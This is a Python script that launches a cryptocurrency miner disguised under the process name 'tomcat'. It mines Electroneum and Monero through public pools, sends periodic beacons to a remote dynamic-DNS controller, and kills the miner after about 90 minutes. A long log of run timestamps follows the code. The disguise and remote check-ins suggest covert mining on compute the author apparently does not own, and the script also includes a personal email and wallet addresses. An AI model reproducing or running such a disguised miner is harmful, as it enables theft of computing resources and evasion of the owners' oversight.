import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:07.275766
#2018-02-17 17:21:04.075595
#2018-02-17 19:09:05.400806
#2018-02-17 20:57:07.264071
#2018-02-17 22:43:03.801257
#2018-02-18 00:27:06.831076
#2018-02-18 02:18:07.327051
#2018-02-18 04:05:07.557871
#2018-02-18 05:56:04.900498
#2018-02-18 07:46:03.684555
#2018-02-18 09:34:06.931384
#2018-02-18 11:22:01.772575
#2018-02-18 13:08:04.352700
#2018-02-18 14:55:06.673098
#2018-02-18 16:43:05.791794
#2018-02-18 18:31:06.913259
#2018-02-18 20:19:04.468335
#2018-02-18 22:04:03.778687
#2018-02-18 23:53:01.514279
#2018-02-19 01:39:06.845758
#2018-02-19 03:27:06.552115
#2018-02-19 05:12:05.166525
#2018-02-19 06:57:07.020123
#2018-02-19 08:47:02.011055
#2018-02-19 10:36:08.584209
#2018-02-19 12:23:04.673524
#2018-02-19 14:09:05.578841
#2018-02-19 15:59:01.431402
#2018-02-19 17:48:05.818033
#2018-02-19 19:34:07.345085
#2018-02-19 21:23:03.490003
#2018-02-19 23:09:05.381090
#2018-02-20 00:54:01.545235
#2018-02-20 02:43:06.080075
#2018-02-20 04:32:08.731885
#2018-02-20 06:16:06.021031
#2018-02-20 08:01:06.097522
#2018-02-20 09:46:10.010661
#2018-02-20 11:30:10.418815
#2018-02-20 13:18:05.673983
#2018-02-20 15:02:07.885039
#2018-02-20 16:46:08.832151
#2018-02-20 18:35:02.178677
#2018-02-20 20:27:02.217261
#2018-02-20 22:13:05.464462
#2018-02-20 23:54:04.060706
#2018-02-21 01:40:08.509589
#2018-02-21 03:29:05.332693
#2018-02-21 05:17:05.133979
#2018-02-21 07:07:06.139152
#2018-02-21 08:53:05.382205
#2018-02-21 10:40:10.153995
#2018-02-21 12:29:04.048024
#2018-02-21 14:16:03.927954
#2018-02-21 16:04:07.985815
#2018-02-21 17:55:09.113553
#2018-02-21 19:41:01.737673
#2018-02-21 21:29:07.632936
#2018-02-21 23:16:06.683505
#2018-02-22 01:07:07.367955
#2018-02-22 02:56:05.299429
#2018-02-22 04:43:06.711385
#2018-02-22 06:29:02.091344
#2018-02-22 08:16:01.393909
#2018-02-22 10:04:07.717710
#2018-02-22 11:48:07.088076
#2018-02-22 13:33:10.110006
#2018-02-22 15:21:07.309370
#2018-02-22 17:06:09.489160
#2018-02-22 18:54:01.485734
#2018-02-22 20:46:08.011688
#2018-02-22 22:30:04.433448
#2018-02-23 00:15:01.507749
#2018-02-23 02:04:04.755940
#2018-02-23 03:52:05.889268
#2018-02-23 05:36:06.919911
#2018-02-23 07:21:07.140418
#2018-02-23 09:25:09.263155
#2018-02-23 11:31:01.742351
#2018-02-23 13:22:10.289386
#2018-02-23 15:07:04.610770
#2018-02-23 16:58:01.332496
#2018-02-23 19:02:01.368854
#2018-02-23 20:49:08.375445
#2018-02-23 22:34:04.529604
#2018-02-24 00:20:08.607824
#2018-02-24 02:12:07.274746
#2018-02-24 04:01:07.509092
#2018-02-24 05:48:02.171745
#2018-02-24 07:38:06.408103
#2018-02-24 09:23:04.885942
#2018-02-24 11:16:03.645986
#2018-02-24 13:05:06.265397
#2018-02-24 14:54:07.102929
#2018-02-24 16:44:06.690442
#2018-02-24 18:32:06.287997
#2018-02-24 20:19:07.166669
#2018-02-24 22:14:07.018253
#2018-02-25 02:31:07.270686
#2018-02-25 06:11:07.550191
#2018-02-25 11:39:06.126655